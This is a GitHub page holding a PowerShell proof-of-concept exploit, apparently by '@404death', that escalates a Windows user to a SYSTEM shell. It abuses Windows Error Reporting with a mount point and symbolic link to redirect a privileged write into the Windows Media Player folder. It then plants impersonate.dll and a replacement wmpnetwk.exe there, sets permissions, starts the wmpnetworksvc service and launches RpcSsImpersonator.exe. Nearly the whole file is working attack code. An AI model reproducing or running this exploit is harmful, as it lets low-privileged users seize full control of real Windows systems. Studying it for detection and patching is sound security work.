-
Notifications
You must be signed in to change notification settings - Fork 31
/
Copy pathpoc.ps1
147 lines (99 loc) · 5.26 KB
/
poc.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# @404death
# FIles/directories deletion to SYSTEM shell
### Load NtApiDotNet
Write-Host "[+] files/directories deletion to SYSTEM shell technique ."
Write-Host "[+] POC by @404death !!!!"
### Load NtApiDotNet
$PathCurrentDirectory = Get-Location
$PathNtApiDotNet = Join-Path -Path $PathCurrentDirectory -Child "NtApiDotNet.dll"
if (![System.IO.File]::Exists($PathNtApiDotNet)){
Import-Module NtObjectManager -ErrorAction Ignore
Write-Host "[*] Imported NtObjectManager module !"
# Write-Host "Hello"
} else {
Import-Module "$PathNtApiDotNet" -ErrorAction "Stop"
Write-Host "[*] Loaded '$PathNtApiDotNet'"
Write-Host "[*] Imported NtObjectManager module !"
}
$path = "c:\programdata\microsoft\windows\wer"
$linkpath = "\RPC Control"
$target1 = "c:\windows\system32\wermgr.exe.local"
$target2 = "C:\Program Files\Windows Media Player"
schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" | Out-Null
Start-Sleep -s 1
Remove-Item -Recurse -Force $path\Temp -ErrorAction SilentlyContinue | Out-Null
Start-Sleep -s 1
[NtApiDotNet.NtFile]::CreateMountPoint("\??\$path", $linkpath, $null) | Out-Null
Write-Host "[+] Mount point created successfully on $linkpath"
$clink = [NtApiDotNet.NtSymbolicLink]::Create("$linkpath\temp", "\??\$target2")
$clink | Out-Null
# [NtApiDotNet.NtSymbolicLink]::Create("$linkpath\temp", "\??\$target2") | Out-Null
# New-NtSymbolicLink "$linkpath\temp" "\??\$target2" | Out-Null
Write-Host "[+] Symbolic link created successfully on $target2"
#Start-Sleep -s 3
# Type definitions taken in part from MSDN documentation as well as from
# http://www.pinvoke.net/default.aspx/wer.WerReportSubmit and http://www.pinvoke.net/default.aspx/wer.WerReportCreate
$MethodDefinition = @'
public enum WER_REPORT_TYPE
{
WerReportNonCritical,
WerReportCritical,
WerReportApplicationCrash,
WerReportApplicationHange,
WerReportKernel,
WerReportInvalid
}
public enum WER_CONSENT
{
WerConsentAlwaysPrompt = 4,
WerConsentApproved = 2,
WerConsentDenied = 3,
WerConsentMax = 5,
WerConsentNotAsked = 1
}
[DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public extern static int WerReportCreate(string pwzEventType, WER_REPORT_TYPE repType, IntPtr pReportInformation, ref IntPtr phReportHandle);
[DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public extern static int WerReportSubmit(IntPtr hReportHandle, int consent, int dwFlags, ref IntPtr pSubmitResult);
'@
Add-Type -MemberDefinition $MethodDefinition -Name 'WER' -Namespace 'Win32' -PassThru | Out-Null
$handle = 0 # Need to create the variable for the ref, so lets add this in so long.
if( ([Win32.WER]::WerReportCreate("A",[Win32.WER+WER_REPORT_TYPE]::WerReportNonCritical, 0, [ref] $handle)) -ne 0 ){ # 0 in third argument is for blank pReportInformation
Write-Host "[-] Exploit failed. Couldn't create the report" -ForegroundColor Red
}
$result = 999 # Need to create the variable for the ref, so set it to a random value of 999.
if( [Win32.WER]::WerReportSubmit($handle, 1, 164, [ref]$result) -eq 0){ # 1 = WerConsentNotAsked, 36 = WER_SUBMIT_QUEUE | WER_SUBMIT_OUTOFPROCESS | WER_SUBMIT_ARCHIVE_PARAMETERS_ONLY
Write-Host "[+] WER directory creation via WER report submission was a success!" -ForegroundColor Green
}
else {
Write-Host "[-] Exploit failed. Couldn't submit the report" -ForegroundColor Red
}
# schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" | Out-Null
# Write-Host "test123"
Start-Sleep -s 1
[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$path") | Out-Null
[NtApiDotNet.NtFile]::Delete("$linkpath\temp") | Out-Null
Remove-Item -Recurse -Force $path -ErrorAction SilentlyContinue | Out-Null
Copy-Item ".\impersonate.dll" -Destination "$target2\" -Force
Start-Sleep -s 1
Copy-Item ".\wmpnetwk.exe" -Destination "$target2\wmpnetwk.exe" -Force
Start-Sleep -s 1
Write-Host "[+] Copied necessary files to $target2"
# icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant 'NT AUTHORITY\NETWORK SERVICE:F'
$execfile = "C:\Program Files\Windows Media Player\wmpnetwk.exe"
$acl = Get-Acl $execfile
$user = "NT AUTHORITY\NETWORK SERVICE"
$AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule($user,"FullControl","Allow")
$acl.SetAccessRule($AccessRule)
$acl | Set-Acl $execfile
Write-Host "[+] Set DACL Permission on payload exec File ..."
Start-Sleep -s 1
Start-Service -Name "wmpnetworksvc" -WarningAction silentlyContinue -ErrorAction SilentlyContinue
$wmpnetworksvcx = "Windows Media Player Network Sharing Service"
#$x = Write-Host "$wmpnetworksvcx" -ForegroundColor Red
Write-Host "[+] The Service : 'wmpnetworksvc' has been triggered !"
#[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$path") | Out-Null
Write-Host "[+] Removed Mount Point . "
Write-Host "[+] Launched RpcSsImpersonator !"
.\RpcSsImpersonator.exe
############## POC by @404death !!!!